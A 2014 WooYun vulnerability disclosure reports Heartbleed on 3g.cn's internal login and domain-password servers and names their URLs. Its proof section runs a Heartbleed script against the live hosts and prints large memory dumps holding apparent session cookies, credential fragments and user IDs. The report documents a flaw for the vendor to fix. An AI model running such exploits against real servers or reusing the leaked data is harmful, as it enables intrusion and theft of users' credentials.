当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077411

漏洞标题:3G门户非常重要的业务系统心脏滴答血(涉及所有重要业务系统56个)

相关厂商:3g.cn

漏洞作者: 路人甲

提交时间:2014-09-26 14:38

修复时间:2014-11-10 14:42

公开时间:2014-11-10 14:42

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

所有重要系统都在这里面啊。

详细说明:

偶然遇到的
https://gouser.3g.net.cn/userManage/login.jsp?systemid=76

3.jpg


里面涉及了基本所有的系统,右上角有个切换系统

33.jpg


123.jpg


https://password.3g.net.cn/iisadmpwd/aexp2.asp
这个是域账户密码修改

1234.jpg


漏洞证明:

C:\openssl>openssl.py -p "443" gouser.3g.net
cn
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 1005
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  ......SC[...r...
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  0100: 00 83 5A 42 FC 6E 17 AB BC 3E A7 E7 27 74 57 5C  ..ZB.n...>..'tW\
  0140: 99 DE 08 F3 86 ED 81 AD 59 EA 0B F3 38 D3 8D E2  ........Y...8...
  0180: 00 05 01 00 00 00 00 00 12 00 00 00 0D 00 12 00  ................
  01c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0200: AB C4 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D  ................
  0240: 54 42 3D 41 4C 44 50 47 45 47 43 41 44 44 45 47  TB=ALDPGEGCADDEG
  0280: 63 65 68 6B 25 34 30 25 32 35 2A 36 32 31 26 6E  cehk%40%25*621&n
  02c0: 95 CD 58 FF E1 40 9B 56 23 36 80 64 F9 C9 FE 51  ..X..@.V#6.d...Q
  0300: 8C B3 1F 14 1B BA 9E 5B CE CD 0D D1 55 F3 B1 AD  .......[....U...
  0340: 72 31 34 30 36 44 02 9C 1A 52 BB 2E FD C0 21 F7  r1406D...R....!.
  0380: 32 30 31 34 2D 37 2D 32 35 20 31 30 3A 30 30 3A  2014-7-25 10:00:
  03c0: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  0400: 22 49 6D 61 67 65 73 2F 50 65 72 73 6F 6E 73 2F  "Images/Persons/
  0440: 22 63 6F 6D 5F 69 6D 67 22 20 20 2F 3E 3C 2F 61  "com_img"  /></a
  0480: B7 E9 A1 BE 5D E7 BB 99 28 E7 8E 8B E5 A8 9C 29  ....]...(......)
  04c0: 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63 5F  iv class="topic_
  0500: 61 6D 65 22 3E 3C 64 69 76 3E 3C 61 20 68 72 65  ame"><div><a hre
  0540: 38 33 65 62 66 63 32 35 33 31 31 22 3E E9 BB 8E  83ebfc25311">...
  0580: 32 37 2D 34 38 65 31 2D 39 39 62 64 2D 64 38 33  27-48e1-99bd-d83
  05c0: 20 E5 8F 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F   ......</span></
  0600: 31 32 30 31 38 32 63 2D 33 66 32 37 2D 34 38 65  120182c-3f27-48e
  0640: 32 30 31 38 32 63 2D 33 66 32 37 2D 34 38 65 31  20182c-3f27-48e1
  0680: 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63  div class="topic
  06c0: 72 2F 3E 5E 5F 5E EF BC 8C E5 A4 A9 E4 BD BF E7  r/>^_^..........
  0700: 3E 3C 2F 64 69 76 3E 3C 2F 64 69 76 3E 3C 64 69  ></div></div><di
  0740: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  0780: 9E 3C 2F 61 3E 20 3C 61 20 68 72 65 66 3D 22 41  .</a> <a href="A
  07c0: 66 63 32 35 33 31 31 22 3E 47 44 30 3C 2F 61 3E  fc25311">GD0</a>
  0800: 76 3E 3C 61 20 63 6C 61 73 73 3D 22 70 68 6F 74  v><a class="phot
  0840: 39 39 62 64 2D 64 38 33 65 62 66 63 32 35 33 31  99bd-d83ebfc2531
  0880: 39 62 64 2D 64 38 33 65 62 66 63 32 35 33 31 31  9bd-d83ebfc25311
  08c0: 22 3E 28 E9 BB 8E E9 9C 9E 29 E9 80 81 E4 BA 86  ">(......)......
  0900: E9 A1 BE EF BC 8C E7 94 9F E6 97 A5 E5 BF AB E4  ................
  0940: 63 6C 61 73 73 3D 22 74 6F 70 69 63 22 3E 3C 64  class="topic"><d
  0980: 69 64 3D 62 31 32 30 31 38 32 63 2D 33 66 32 37  id=b120182c-3f27
  09c0: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  0a00: 64 69 76 3E 3C 73 70 61 6E 3E 32 30 31 34 2D 37  div><span>2014-7
  0a40: 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78  href="Album.aspx
  0a80: 3C 69 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73  <img src="Images
  0ac0: 67 22 20 63 6C 61 73 73 3D 22 63 6F 6D 5F 69 6D  g" class="com_im
  0b00: A9 E4 BD BF E7 9A 84 E7 9C B7 E9 A1 BE 5D E7 BB  .............]..
  0b40: 7E 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64 69 76  ~<br/></div><div
  0b80: 3C 64 69 76 20 20 63 6C 61 73 73 3D 22 6E 61 6D  <div  class="nam
  0bc0: 36 39 2D 34 32 63 37 2D 38 63 32 64 2D 62 36 66  69-42c7-8c2d-b6f
  0c00: 73 6F 6E 69 64 3D 62 62 35 62 37 38 64 61 2D 64  sonid=bb5b78da-d
  0c40: 73 70 61 6E 3E 32 30 31 34 2D 37 2D 32 35 20 39  span>2014-7-25 9
  0c80: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  0cc0: 73 72 63 3D 22 49 6D 61 67 65 73 2F 50 65 72 73  src="Images/Pers
  0d00: 61 73 73 3D 22 63 6F 6D 5F 69 6D 67 22 20 20 2F  ass="com_img"  /
  0d40: BE 8E E6 89 8B E8 A2 8B 5D E7 BB 99 28 E7 8E 8B  ........]...(...
  0d80: 3C 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69  <div class="topi
  0dc0: 65 72 73 6F 6E 69 64 3D 38 35 66 63 62 38 30 62  ersonid=85fcb80b
  0e00: 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F  ref="Album.aspx?
  0e40: BA A7 E5 93 81 E9 83 A8 3C 2F 61 3E 3C 2F 64 69  ........</a></di
  0e80: 63 6C 61 73 73 3D 22 70 68 6F 74 6F 22 20 68 72  class="photo" hr
  0ec0: 64 36 33 65 32 61 61 37 37 61 34 38 22 3E 3C 69  d63e2aa77a48"><i
  0f00: 36 33 65 32 61 61 37 37 61 34 38 2E 6A 70 67 22  63e2aa77a48.jpg"
  0f40: 8E E9 87 91 E7 8F 82 29 E9 80 81 E4 BA 86 5B E7  .......)......[.
  0f80: 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E  "topic_l"></div>
  0fc0: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  1000: 31 61 22 3E E6 B1 AA E7 9B 88 3C 2F 61 3E 20 3C  1a">......</a> <
  1040: 32 62 66 2D 63 30 31 63 61 61 35 30 35 32 31 61  2bf-c01caa50521a
  1080: 2D 32 35 20 39 3A 31 36 3A 30 31 20 E5 8F 91 E8  -25 9:16:01 ....
  10c0: 3F 70 65 72 73 6F 6E 69 64 3D 36 37 33 61 65 66  ?personid=673aef
  1100: 2F 50 65 72 73 6F 6E 73 2F 4E 6F 50 69 63 2E 70  /Persons/NoPic.p
  1140: 28 E6 B1 AA E7 9B 88 29 E9 80 81 E4 BA 86 5B E7  (......)......[.
  1180: 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E  "topic_l"></div>
  11c0: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  1200: 31 61 22 3E E6 B1 AA E7 9B 88 3C 2F 61 3E 20 3C  1a">......</a> <
  1240: 32 62 66 2D 63 30 31 63 61 61 35 30 35 32 31 61  2bf-c01caa50521a
  1280: 2D 32 35 20 39 3A 31 35 3A 34 39 20 E5 8F 91 E8  -25 9:15:49 ....
  12c0: 3F 70 65 72 73 6F 6E 69 64 3D 36 37 33 61 65 66  ?personid=673aef
  1300: 2F 50 65 72 73 6F 6E 73 2F 4E 6F 50 69 63 2E 70  /Persons/NoPic.p
  1340: 28 E6 B1 AA E7 9B 88 29 E9 80 81 E4 BA 86 5B E7  (......)......[.
  1380: 70 69 63 5F 6C 22 3E 3C 2F 64 69 76 3E 3C 2F 64  pic_l"></div></d
  13c0: 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70   href="Album.asp
  1400: 3E E5 8D 93 E9 9F AC 3C 2F 61 3E 20 3C 61 20 68  >......</a> <a h
  1440: 2D 33 34 35 65 30 64 30 35 32 38 32 31 22 3E E5  -345e0d052821">.
  1480: 20 32 31 3A 32 32 3A 31 34 20 E5 8F 91 E8 A1 A8   21:22:14 ......
  14c0: 65 72 73 6F 6E 69 64 3D 64 31 63 66 39 63 32 31  ersonid=d1cf9c21
  1500: 65 72 73 6F 6E 73 2F 64 31 63 66 39 63 32 31 2D  ersons/d1cf9c21-
  1540: 20 20 2F 3E 3C 2F 61 3E 3C 64 69 76 20 63 6C 61    /></a><div cla
  1580: E7 8E 89 E8 B4 A2 29 3C 62 72 2F 3E 68 61 70 70  ......)<br/>happ
  15c0: 3E 3C 2F 64 69 76 3E 3C 64 69 76 20 63 6C 61 73  ></div><div clas
  1600: 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 64  .aspx?personid=d
  1640: 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61  <a href="Album.a
  1680: 31 22 3E E5 BA 94 E7 94 A8 E8 BD AF E4 BB B6 E7  1">.............
  16c0: 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F 64 69 76  ....</span></div
  1700: 39 63 32 31 2D 30 35 35 33 2D 34 39 39 33 2D 38  9c21-0553-4993-8
  1740: 63 32 31 2D 30 35 35 33 2D 34 39 39 33 2D 38 39  c21-0553-4993-89
  1780: 20 63 6C 61 73 73 3D 22 74 6F 70 69 63 5F 6D 22   class="topic_m"
  17c0: 68 61 70 70 79 20 62 69 72 74 68 64 61 79 21 3C  happy birthday!<
  1800: 63 6C 61 73 73 3D 22 74 6F 70 69 63 22 3E 3C 64  class="topic"><d
  1840: 69 64 3D 64 31 63 66 39 63 32 31 2D 30 35 35 33  id=d1cf9c21-0553
  1880: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  18c0: E4 BB B6 E7 A0 94 E5 8F 91 E4 B8 AD E5 BF 83 3C  ...............<
  1900: 2F 64 69 76 3E 3C 61 20 63 6C 61 73 73 3D 22 70  /div><a class="p
  1940: 39 33 2D 38 39 63 66 2D 33 34 35 65 30 64 30 35  93-89cf-345e0d05
  1980: 33 2D 38 39 63 66 2D 33 34 35 65 30 64 30 35 32  3-89cf-345e0d052
  19c0: 63 5F 6D 22 3E 28 E5 8D 93 E9 9F AC 29 E9 80 81  c_m">(......)...
  1a00: 61 79 21 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64  ay!<br/></div><d
  1a40: 22 3E 3C 64 69 76 20 20 63 6C 61 73 73 3D 22 6E  "><div  class="n
  1a80: 34 33 35 64 2D 34 33 66 31 2D 38 31 62 63 2D 64  435d-43f1-81bc-d
  1ac0: 65 72 73 6F 6E 69 64 3D 62 39 65 63 62 35 32 64  ersonid=b9ecb52d
  1b00: 3E 3C 73 70 61 6E 3E 32 30 31 34 2D 37 2D 32 34  ><span>2014-7-24
  1b40: 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70  ef="Album.aspx?p
  1b80: 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F 50  mg src="Images/P
  1bc0: 20 63 6C 61 73 73 3D 22 63 6F 6D 5F 69 6D 67 22   class="com_img"
  1c00: 94 9F E6 97 A5 E8 9B 8B E7 B3 95 5D E7 BB 99 28  ...........]...(
  1c40: 3D 22 74 6F 70 69 63 5F 6C 22 3E 3C 2F 64 69 76  ="topic_l"></div
  1c80: 76 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D  v><a href="Album
  1cc0: 61 34 38 22 3E E6 9D 8E E9 87 91 E7 8F 82 3C 2F  a48">.........</
  1d00: 30 32 2D 39 39 64 36 2D 64 36 33 65 32 61 61 37  02-99d6-d63e2aa7
  1d40: 20 E5 8F 91 E8 A1 A8 3C 2F 73 70 61 6E 3E 3C 2F   ......</span></
  1d80: 35 66 63 62 38 30 62 2D 62 64 65 66 2D 34 63 30  5fcb80b-bdef-4c0
  1dc0: 66 63 62 38 30 62 2D 62 64 65 66 2D 34 63 30 32  fcb80b-bdef-4c02
  1e00: 64 69 76 20 63 6C 61 73 73 3D 22 74 6F 70 69 63  div class="topic
  1e40: 29 3C 62 72 2F 3E 3C 2F 64 69 76 3E 3C 64 69 76  )<br/></div><div
  1e80: 2F 64 69 76 3E 3C 21 2D 2D 65 6E 64 20 74 6F 64  /div><!--end tod
  1ec0: 74 22 3E 0D 0A 20 20 20 20 20 20 20 20 20 20 20  t">..
  1f00: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  1f40: 73 70 61 6E 3E 31 32 37 3C 2F 73 70 61 6E 3E E4  span>127</span>.
  1f80: 6D 6D 65 6E 74 2E 61 73 70 78 3F 74 69 64 3D 32  mment.aspx?tid=2
  1fc0: 3C 74 65 78 74 61 72 65 61 20 63 6C 61 73 73 3D  <textarea class=
  2000: BA 94 3C 2F 74 65 78 74 61 72 65 61 3E 0D 0A 20  ..</textarea>..
  2040: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  2080: 79 6C 65 3D 22 62 61 63 6B 67 72 6F 75 6E 64 3A  yle="background:
  20c0: 6E 22 20 6F 6E 63 6C 69 63 6B 3D 22 61 64 64 63  n" onclick="addc
  2100: 22 20 76 61 6C 75 65 3D 22 E6 8F 90 E4 BA A4 22  " value="......"
  2140: 3C 21 2D 2D 65 64 6E 20 63 6F 6E 5F 31 2D 2D 3E  <!--edn con_1-->
  2180: 0A 20 20 20 20 20 20 20 20 20 20 20 20 09 3C 75  .            .<u
  21c0: 22 6F 6E 22 3E 3C 61 20 68 72 65 66 3D 22 6A 61  "on"><a href="ja
  2200: 20 20 20 20 20 20 20 20 20 09 0D 0A 20 20 20 20           ...
  2240: 3B 22 20 73 74 79 6C 65 3D 22 77 69 64 74 68 3A  ;" style="width:
  2280: 81 E5 AF 84 E8 AF AD 3C 2F 73 70 61 6E 3E 3C 2F  .......</span></
  22c0: 61 76 2D 2D 3E 0D 0A 20 20 20 20 20 20 20 20 20  av-->..
  2300: 34 5F 63 6F 6E 22 20 69 64 3D 22 61 63 74 39 22  4_con" id="act9"
  2340: 6F 6D 2E 61 73 70 78 3F 69 64 3D 31 32 33 34 26  om.aspx?id=1234&
  2380: 3C 6C 69 3E 3C 61 20 68 72 65 66 3D 22 41 72 74  <li><a href="Art
  23c0: E6 8A A5 E3 80 8B 32 30 31 33 2D 30 37 2D 32 39  ......2013-07-29
  2400: 32 26 66 72 69 64 3D 30 22 3E E2 80 A2 20 E3 80  2&frid=0">... ..
  2440: 72 74 69 63 6C 65 57 69 74 68 43 6F 6D 2E 61 73  rticleWithCom.as
  2480: 30 37 3C 2F 61 3E 3C 2F 6C 69 3E 3C 61 20 63 6C  07</a></li><a cl
  24c0: 20 3E E6 9B B4 E5 A4 9A 3C 2F 61 3E 20 20 20 20   >......</a>
  2500: 20 20 20 20 20 20 3C 2F 75 6C 3E 0D 0A 20 20 20        </ul>..
  2540: 3D 22 63 6F 6E 34 5F 63 6F 6E 22 20 69 64 3D 22  ="con4_con" id="
  2580: 68 72 65 66 3D 22 41 72 74 69 63 6C 65 57 69 74  href="ArticleWit
  25c0: E6 9B B4 E5 A4 A7 E7 9A 84 E8 80 83 E9 AA 8C EF  ................
  2600: 31 36 39 26 66 72 69 64 3D 30 22 3E E2 80 A2 20  169&frid=0">...
  2640: E6 97 B6 E9 97 B4 E6 9B B4 E5 80 BC E9 92 B1 EF  ................
  2680: 31 31 31 26 66 72 69 64 3D 30 22 3E E2 80 A2 20  111&frid=0">...
  26c0: E4 B8 96 E7 95 8C E5 A4 A7 E6 88 98 E6 8E A5 E8  ................
  2700: 66 3D 22 41 72 74 69 63 6C 65 57 69 74 68 43 6F  f="ArticleWithCo
  2740: E3 80 91 E2 80 94 E2 80 94 39 E5 91 A8 E5 B9 B4  .........9......
  2780: 65 66 3D 22 41 63 74 69 76 65 4C 69 73 74 2E 61  ef="ActiveList.a
  27c0: 20 20 20 20 3C 2F 75 6C 3E 0D 0A 20 20 20 20 20      </ul>..
  2800: 76 3E 3C 21 2D 2D 65 6E 64 20 63 6F 6E 5F 34 2D  v><!--end con_4-
  2840: 20 63 6C 61 73 73 3D 22 63 6F 6E 5F 32 22 3E 0D   class="con_2">.
  2880: 09 3C 64 69 76 20 63 6C 61 73 73 3D 22 63 6F 6E  .<div class="con
  28c0: 5F 72 74 22 3E 3C 2F 64 69 76 3E 0D 0A 20 20 20  _rt"></div>..
  2900: 69 76 20 63 6C 61 73 73 3D 22 6A 6F 62 65 72 22  iv class="jober"
  2940: A4 9A 3C 2F 61 3E 3C 2F 64 69 76 3E 0D 0A 20 20  ..</a></div>..
  2980: 20 20 20 20 09 3C 64 69 76 20 63 6C 61 73 73 3D      .<div class=
  29c0: 73 3D 22 72 65 63 65 6E 74 5F 6A 6F 62 22 3E 0D  s="recent_job">.
  2a00: 3D 22 72 65 63 65 6E 74 65 6E 74 72 79 22 20 3E  ="recententry" >
  2a40: 20 20 20 20 20 20 3C 2F 64 69 76 3E 0D 0A 20 20        </div>..
  2a80: 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20  .
  2ac0: 20 20 20 20 20 20 20 20 20 3C 64 69 76 20 63 6C           <div cl
  2b00: 70 78 22 3E E6 9B B4 E5 A4 9A 3C 2F 61 3E 3C 2F  px">......</a></
  2b40: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
  2b80: 20 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 61     <div class="a
  2bc0: 68 6F 74 6F 22 3E 0D 0A 20 20 20 20 20 20 20 20  hoto">..
  2c00: 6F 6E 69 64 3D 35 62 61 32 32 36 33 36 2D 38 30  onid=5ba22636-80
  2c40: 73 72 63 3D 22 49 6D 61 67 65 73 2F 50 65 72 73  src="Images/Pers
  2c80: 61 73 73 3D 22 61 6C 6C 70 68 6F 74 6F 5F 69 6D  ass="allphoto_im
  2cc0: 38 30 36 63 2D 34 63 34 36 2D 61 63 35 32 2D 62  806c-4c46-ac52-b
  2d00: 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 31 66 38  spx?personid=1f8
  2d40: 6B 22 3E 3C 69 6D 67 20 73 72 63 3D 22 49 6D 61  k"><img src="Ima
  2d80: 2E 6A 70 67 22 20 63 6C 61 73 73 3D 22 61 6C 6C  .jpg" class="all
  2dc0: 66 38 30 36 37 33 65 2D 35 64 36 65 2D 34 37 36  f80673e-5d6e-476
  2e00: 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73  "Album.aspx?pers
  2e40: 74 3D 22 5F 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20  t="_blank"><img
  2e80: 30 37 62 61 33 32 66 62 2E 6A 70 67 22 20 63 6C  07ba32fb.jpg" cl
  2ec0: 72 73 6F 6E 69 64 3D 35 36 34 37 30 32 62 36 2D  rsonid=564702b6-
  2f00: 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61  <a href="Album.a
  2f40: 66 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61 6E  f" target="_blan
  2f80: 63 38 39 2D 31 39 61 64 30 66 62 37 63 61 33 66  c89-19ad0fb7ca3f
  2fc0: 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 62  .aspx?personid=b
  3000: 61 3E 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72  a></li><li><a hr
  3040: 30 37 30 32 37 31 32 61 62 37 63 66 22 20 74 61  0702712ab7cf" ta
  3080: 61 64 64 62 2D 34 38 31 62 2D 61 33 33 34 2D 30  addb-481b-a334-0
  30c0: 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78  href="Album.aspx
  3100: E5 B4 94 E6 98 A5 E5 BF 83 3C 2F 61 3E 3C 2F 6C  .........</a></l
  3140: 2D 34 32 32 36 2D 39 33 39 64 2D 31 63 37 65 32  -4226-939d-1c7e2
  3180: 73 2F 63 63 32 36 31 64 37 63 2D 32 65 33 34 2D  s/cc261d7c-2e34-
  31c0: 20 20 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D    /></a><a href=
  3200: 65 32 32 36 35 34 32 33 64 22 3E E5 88 98 E4 BF  e2265423d">.....
  3240: 37 64 39 65 61 38 2D 62 32 63 62 2D 34 63 31 38  7d9ea8-b2cb-4c18
  3280: 61 67 65 73 2F 50 65 72 73 6F 6E 73 2F 37 38 37  ages/Persons/787
  32c0: 6C 70 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C  lphoto_img"  /><
  3300: 31 38 2D 61 35 37 63 2D 63 36 31 30 32 63 61 39  18-a57c-c6102ca9
  3340: 70 65 72 73 6F 6E 69 64 3D 61 64 66 39 38 31 31  personid=adf9811
  3380: 69 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F  img src="Images/
  33c0: 22 20 63 6C 61 73 73 3D 22 61 6C 6C 70 68 6F 74  " class="allphot
  3400: 31 31 65 2D 37 36 62 62 2D 34 66 39 39 2D 62 30  11e-76bb-4f99-b0
  3440: 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64  um.aspx?personid
  3480: 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20 73 72 63 3D  blank"><img src=
  34c0: 38 65 30 35 2E 6A 70 67 22 20 63 6C 61 73 73 3D  8e05.jpg" class=
  3500: 69 64 3D 34 34 62 30 33 65 39 31 2D 33 32 66 33  id=44b03e91-32f3
  3540: 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73  a href="Album.as
  3580: 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61 6E 6B  " target="_blank
  35c0: 61 61 2D 31 38 61 35 65 31 30 66 65 63 64 37 2E  aa-18a5e10fecd7.
  3600: 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D 34 35  aspx?personid=45
  3640: 3E 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72 65  ></li><li><a hre
  3680: 62 39 61 38 38 32 37 37 30 61 36 22 20 74 61 72  b9a882770a6" tar
  36c0: 63 61 30 2D 34 66 63 36 2D 61 38 34 63 2D 38 62  ca0-4fc6-a84c-8b
  3700: 72 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F  ref="Album.aspx?
  3740: BB BB E6 A2 93 E6 B6 B5 3C 2F 61 3E 3C 2F 6C 69  ........</a></li
  3780: 34 66 33 30 2D 61 63 36 38 2D 64 62 35 38 37 30  4f30-ac68-db5870
  37c0: 2F 62 34 63 65 34 62 62 39 2D 39 61 35 30 2D 34  /b4ce4bb9-9a50-4
  3800: 20 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D 22   /></a><a href="
  3840: 37 30 36 31 36 33 63 38 22 3E E8 A2 81 E6 85 A7  706163c8">......
  3880: 34 33 30 63 35 2D 37 30 37 32 2D 34 38 32 36 2D  430c5-7072-4826-
  38c0: 67 65 73 2F 50 65 72 73 6F 6E 73 2F 62 33 64 34  ges/Persons/b3d4
  3900: 70 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C 2F  photo_img"  /></
  3940: 36 2D 39 39 38 66 2D 30 32 63 36 34 61 63 31 66  6-998f-02c64ac1f
  3980: 65 72 73 6F 6E 69 64 3D 62 61 63 62 32 64 37 31  ersonid=bacb2d71
  39c0: 6D 67 20 73 72 63 3D 22 49 6D 61 67 65 73 2F 50  mg src="Images/P
  3a00: 20 63 6C 61 73 73 3D 22 61 6C 6C 70 68 6F 74 6F   class="allphoto
  3a40: 37 31 2D 65 64 36 62 2D 34 33 63 66 2D 62 65 61  71-ed6b-43cf-bea
  3a80: 6C 62 75 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E  lbum.aspx?person
  3ac0: 22 5F 62 6C 61 6E 6B 22 3E 3C 69 6D 67 20 73 72  "_blank"><img sr
  3b00: 63 66 36 65 36 62 2E 6A 70 67 22 20 63 6C 61 73  cf6e6b.jpg" clas
  3b40: 6F 6E 69 64 3D 62 38 39 36 34 39 39 36 2D 39 63  onid=b8964996-9c
  3b80: 3E 3C 61 20 68 72 65 66 3D 22 41 6C 62 75 6D 2E  ><a href="Album.
  3bc0: 33 66 22 20 74 61 72 67 65 74 3D 22 5F 62 6C 61  3f" target="_bla
  3c00: 38 65 37 30 2D 30 39 34 34 64 30 64 34 32 38 33  8e70-0944d0d4283
  3c40: 6D 2E 61 73 70 78 3F 70 65 72 73 6F 6E 69 64 3D  m.aspx?personid=
  3c80: 3C 2F 6C 69 3E 3C 6C 69 3E 3C 61 20 68 72 65 66  </li><li><a href
  3cc0: 61 32 62 63 30 63 30 64 33 30 22 20 74 61 72 67  a2bc0c0d30" targ
  3d00: 35 33 2D 34 66 38 61 2D 38 38 39 36 2D 35 62 61  53-4f8a-8896-5ba
  3d40: 65 66 3D 22 41 6C 62 75 6D 2E 61 73 70 78 3F 70  ef="Album.aspx?p
  3d80: A8 E6 B3 BD E9 94 8B 3C 2F 61 3E 3C 2F 6C 69 3E  .......</a></li>
  3dc0: 33 63 35 2D 62 35 37 35 2D 32 35 62 65 39 61 66  3c5-b575-25be9af
  3e00: 37 32 34 63 63 62 31 37 2D 39 34 63 63 2D 34 33  724ccb17-94cc-43
  3e40: 2F 3E 3C 2F 61 3E 3C 61 20 68 72 65 66 3D 22 41  /></a><a href="A
  3e80: 61 66 33 36 63 33 33 22 3E E8 8C B9 E9 9B AA E8  af36c33">.......
  3ec0: 66 61 63 61 2D 31 32 65 64 2D 34 37 35 33 2D 39  faca-12ed-4753-9
  3f00: 65 73 2F 50 65 72 73 6F 6E 73 2F 31 30 36 39 66  es/Persons/1069f
  3f40: 68 6F 74 6F 5F 69 6D 67 22 20 20 2F 3E 3C 2F 61  hoto_img"  /></a
  3f80: 2D 39 30 36 35 2D 30 64 36 62 63 37 66 30 39 38  -9065-0d6bc7f098
  3fc0: 6E 69 64 3D 63 32 31 32 64 35 35 30 2D 62 39 66  nid=c212d550-b9f


openssl.py -p "443" password.3g.net.cn
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 1005
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  ......SC[...r...
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  0100: 00 83 5A 42 FC 6E 17 AB BC 3E A7 E7 27 74 57 5C  ..ZB.n...>..'tW\
  0140: 99 DE 08 F3 86 ED 81 AD 59 EA 0B F3 38 D3 8D E2  ........Y...8...
  0180: 00 05 01 00 00 00 00 00 12 00 00 00 0D 00 12 00  ................
  01c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0200: AB C4 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D  ................
  0240: 54 42 3D 41 4C 44 50 47 45 47 43 41 44 44 45 47  TB=ALDPGEGCADDEG
  0280: 63 65 68 6B 25 34 30 25 32 35 2A 36 32 31 26 6E  cehk%40%25*621&n
  02c0: 95 CD 58 FF E1 40 9B 56 23 36 80 64 F9 C9 FE 51  ..X..@.V#6.d...Q
  0300: 8C B3 1F 14 1B BA 9E 5B CE CD 0D D1 55 F3 B1 AD  .......[....U...
  0340: 72 31 34 30 36 44 02 9C 1A 52 BB 2E FD C0 21 F7  r1406D...R....!.
